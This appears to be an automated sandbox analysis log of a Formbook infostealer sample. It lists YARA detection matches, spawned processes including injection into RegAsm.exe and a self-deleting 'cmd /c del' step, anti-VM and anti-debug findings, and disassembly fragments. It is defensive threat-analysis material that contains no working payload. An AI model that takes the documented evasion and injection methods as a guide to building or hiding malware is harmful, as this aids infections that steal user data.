Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: NQQWym075C.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/0@15/8
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_01
Source: NQQWym075C.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NQQWym075C.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\NQQWym075C.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\NQQWym075C.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\NQQWym075C.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wlanext.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wlanext.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: NQQWym075C.exe | Virustotal: Detection: 30%
Source: NQQWym075C.exe | ReversingLabs: Detection: 48%
Source: C:\Users\user\Desktop\NQQWym075C.exe | File read: C:\Users\user\Desktop\NQQWym075C.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown | Process created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown | Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Users\user\Desktop\NQQWym075C.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\NQQWym075C.exe | Process created: C:\Users\user\Desktop\NQQWym075C.exe 'C:\Users\user\Desktop\NQQWym075C.exe'
Source: C:\Users\user\Desktop\NQQWym075C.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Source: C:\Users\user\Desktop\NQQWym075C.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: NQQWym075C.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NQQWym075C.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: RegAsm.exe, 00000002.00000002.276281432.0000000002E50000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, RegAsm.exe, 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, wlanext.exe, 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.276393755.0000000004770000.00000040.00000001.sdmp
          Source: Binary string: RegAsm.pdb source: wlanext.exe, 00000006.00000002.489706103.0000000003C27000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe, wlanext.exe, cscript.exe
          Source: Binary string: wlanext.pdb source: RegAsm.exe, 00000005.00000002.263382361.0000000002DC0000.00000040.00000001.sdmp
          Source: Binary string: RegAsm.pdb4 source: wlanext.exe, 00000006.00000002.489706103.0000000003C27000.00000004.00000001.sdmp
          Source: Binary string: cscript.pdb source: RegAsm.exe, 00000002.00000002.276281432.0000000002E50000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: RegAsm.exe, 00000005.00000002.263382361.0000000002DC0000.00000040.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_00417141 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0041B375 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0041B3C2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0041B3CB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_00419BB1 push cs; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_00406420 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0041B42C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_00419CAC push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_00415D49 push 0000004Ah; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0306D0D1 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 5_2_00417141 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 5_2_0041B375 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 5_2_0041B3C2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 5_2_0041B3CB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 5_2_00419BB1 push cs; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 5_2_00406420 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 5_2_0041B42C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 5_2_00419CAC push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 5_2_00415D49 push 0000004Ah; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 5_2_02F4D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe - Code function: 6_2_0376D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe - Code function: 6_2_0325B375 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe - Code function: 6_2_03259BB1 push cs; iretd
          Source: C:\Windows\SysWOW64\wlanext.exe - Code function: 6_2_0325B3C2 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe - Code function: 6_2_0325B3CB push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe - Code function: 6_2_03257141 pushfd ; ret
          Source: C:\Windows\SysWOW64\wlanext.exe - Code function: 6_2_03255D49 push 0000004Ah; retf
          Source: C:\Windows\SysWOW64\wlanext.exe - Code function: 6_2_03246420 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe - Code function: 6_2_0325B42C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe - Code function: 6_2_03259CAC push esp; ret
          Source: C:\Windows\SysWOW64\cscript.exe - Code function: 10_2_047ED0D1 push ecx; ret
          Source: initial sample - Static PE information: section name: .text entropy: 7.85956112401
          Source: C:\Users\user\Desktop\NQQWym075C.exe - Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - RDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - RDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe - RDTSC instruction interceptor: First address: 00000000032485C4 second address: 00000000032485CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe - RDTSC instruction interceptor: First address: 000000000324894E second address: 0000000003248954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe - RDTSC instruction interceptor: First address: 00000000029685C4 second address: 00000000029685CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe - RDTSC instruction interceptor: First address: 000000000296894E second address: 0000000002968954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NQQWym075C.exe - File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_00408880 rdtsc
          Source: C:\Users\user\Desktop\NQQWym075C.exe - Window / User API: threadDelayed 1771
          Source: C:\Users\user\Desktop\NQQWym075C.exe - Window / User API: threadDelayed 1364
          Source: C:\Users\user\Desktop\NQQWym075C.exe TID: 5256 - Thread sleep time: -35420s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6332 - Thread sleep time: -55000s >= -30000s
          Source: C:\Users\user\Desktop\NQQWym075C.exe TID: 1932 - Thread sleep count: 233 > 30
          Source: C:\Users\user\Desktop\NQQWym075C.exe TID: 5520 - Thread sleep count: 1364 > 30
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4012 - Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exe - Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exe - Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
          Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmp - Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmp - Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.258002890.000000000F5C0000.00000004.00000001.sdmp - Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.251807109.0000000008640000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmp - Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000002.500819308.00000000055D0000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: wlanext.exe, 00000006.00000002.485879155.00000000034BE000.00000004.00000020.sdmp - Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.251954478.000000000871F000.00000004.00000001.sdmp - Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.252038258.00000000087D1000.00000004.00000001.sdmp - Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000002.500867105.0000000005603000.00000004.00000001.sdmp - Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmp - Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmp - Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.239692433.0000000004DF3000.00000004.00000001.sdmp - Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
          Source: explorer.exe, 00000003.00000000.251320016.0000000008220000.00000002.00000001.sdmp - Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\NQQWym075C.exe - Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe - Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe - Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_00408880 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03059A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0301DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0301F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0301DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03043B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03021B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03042397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0304B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03044BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0303DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03028A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03015210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03015210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0301AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03033A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03054A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0303A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03019240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0305927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0304D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0302AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0304FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03042ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03042AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03019100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03034120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03034120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0304513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0303B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0301C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0301B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0304A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0303C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03042990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0301B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03097016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0302B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0304002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03030050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03019080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_03093884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030420A0 mov eax, dword ptr fs:[00000030h]
